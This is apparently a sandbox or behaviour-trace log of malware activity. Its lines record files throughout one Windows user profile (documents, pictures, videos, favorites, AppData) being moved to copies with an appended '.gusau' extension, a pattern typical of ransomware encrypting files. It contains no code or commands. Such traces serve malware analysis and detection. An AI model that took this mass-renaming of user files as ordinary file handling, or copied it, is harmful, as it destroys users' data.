Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\pelEM3i4e4Jx_4 Wkx.pdf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\pelEM3i4e4Jx_4 Wkx.pdf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\z2lk.jpg.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\z2lk.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\P1zhXc0ibiHP0Bs2v5.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\P1zhXc0ibiHP0Bs2v5.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\l6LO.bmp.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\l6LO.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\MFSIcW7l5OKlh5.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\MFSIcW7l5OKlh5.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\WQb DhJ7Wo.jpg.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\WQb DhJ7Wo.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\_1-Z0l.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\_1-Z0l.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\8Vj kyoaTN1vy L0-Vsr.mp4.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\8Vj kyoaTN1vy L0-Vsr.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\9zW0DyjAU1Nrc.mkv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\9zW0DyjAU1Nrc.mkv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\BoizzI4g97t.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\BoizzI4g97t.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\fXPAxGgq.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\fXPAxGgq.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\Iq gbMO_n.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\Iq gbMO_n.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\UtVdyOv5.swf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\UtVdyOv5.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\2BSi.ods.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\2BSi.ods True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eOYyRR2EObYB.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eOYyRR2EObYB.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eZfj5ZvjMOZ.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eZfj5ZvjMOZ.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\O7mIpznG0.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\O7mIpznG0.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\qDPtFMhAiJ2xQ vm.odp.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\qDPtFMhAiJ2xQ vm.odp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\1TiNgxSzmOsn7Ri OkP.ots.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\1TiNgxSzmOsn7Ri OkP.ots True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\20r7oIjlUFUIkP.ppt.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\20r7oIjlUFUIkP.ppt True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\ALIdU0.docx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\ALIdU0.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\C0 _B8qINeQrUbrt.csv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\C0 _B8qINeQrUbrt.csv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\faBTC43kElpNlGMFau.pps.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\faBTC43kElpNlGMFau.pps True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\CugNJ6pb94kQCPMiK.jpg.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\CugNJ6pb94kQCPMiK.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\pySmPr79Heo.png.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\pySmPr79Heo.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\Zusq yA8dO-j.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\Zusq yA8dO-j.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\3CYFm.jpg.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\3CYFm.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\KZrZHmvQBeSkBOCD.jpg.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\KZrZHmvQBeSkBOCD.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\m7Zhy4P-VQ66.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\m7Zhy4P-VQ66.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\R7Kau5o.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\R7Kau5o.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\3Bsx2yMEE1UNteJQW\OQg8wwtsOsz4VSDTpD.png.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\3Bsx2yMEE1UNteJQW\OQg8wwtsOsz4VSDTpD.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\bbyLspO02\hd0ZLwcXz17isUe1hi_.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\bbyLspO02\hd0ZLwcXz17isUe1hi_.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\bbyLspO02\y lRKLTJHdvF Q.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\bbyLspO02\y lRKLTJHdvF Q.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\eyP8XnrLY rQ9ZYZ.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\eyP8XnrLY rQ9ZYZ.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\lfJNr8tOZ7oDHun6ukoV.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\lfJNr8tOZ7oDHun6ukoV.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\VFWyDHM.png.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\pYG2mrJ4CHtyyhs xGQU\VFWyDHM.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\a9qF7OuHrZ4T.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\a9qF7OuHrZ4T.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\KEz1B VUjzGhZ.swf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\KEz1B VUjzGhZ.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\RrLl7FRJlURSY01.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\RrLl7FRJlURSY01.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\X98zhXIRm mnrxp8RLxH.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\X98zhXIRm mnrxp8RLxH.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\1Sx-VZ.ppt.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\1Sx-VZ.ppt True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5ETH-YOt.pps.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5ETH-YOt.pps True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5LxZSjV.pdf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\5LxZSjV.pdf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\8GBnXsZ.pdf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\8GBnXsZ.pdf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\aVltm_fp_1spcSpiUB7E.pptx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\aVltm_fp_1spcSpiUB7E.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\c7w3Be_K.pptx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\c7w3Be_K.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\dthjAR.odt.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\dthjAR.odt True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\HOw3I9OnurIF0.pptx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\HOw3I9OnurIF0.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\ieaOD_.odt.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\ieaOD_.odt True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\kLhp.docx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\kLhp.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\M85S8 e0deSz1O2lZp.xls.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\M85S8 e0deSz1O2lZp.xls True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\pbZLWA2gHx6B.ods.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\pbZLWA2gHx6B.ods True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\z ACbUu.csv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\5T4sBt2\z ACbUu.csv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\NSMy5XFpc9v55E4.png.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\NSMy5XFpc9v55E4.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\sMjYpjKhyZpf8TNaMG.gif.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\sMjYpjKhyZpf8TNaMG.gif True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\V6CUx4Z.png.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\V6CUx4Z.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\l65Ij.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\l65Ij.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\lZ73i.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\lZ73i.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\NDd8nvPiASazxx_Qnd.mp4.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\NDd8nvPiASazxx_Qnd.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\QV66E7hBIev3ByZZaaQi.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\QV66E7hBIev3ByZZaaQi.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\T0lSyaUX_nTdUnU89-7l.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\T0lSyaUX_nTdUnU89-7l.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\M9S6OcF7aYbMU.swf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\M9S6OcF7aYbMU.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\MKQEfW1 O9_GGct.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\MKQEfW1 O9_GGct.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\PVK83zEhiJoptl7F1vB.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\PVK83zEhiJoptl7F1vB.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\xSTCc.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\xSTCc.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\E31COVq.mkv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\E31COVq.mkv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\QDp9.mp4.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\QDp9.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\utbmN6bsL1s2QoyIy_N.mp4.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\utbmN6bsL1s2QoyIy_N.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\bjmnfbrNfGEXCMraZ.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\bjmnfbrNfGEXCMraZ.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\Djmg5Xg.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\Djmg5Xg.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\pW-HWPux0H.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\pW-HWPux0H.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\UMlO p8XR.mp4.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\UMlO p8XR.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml True 1
Fn
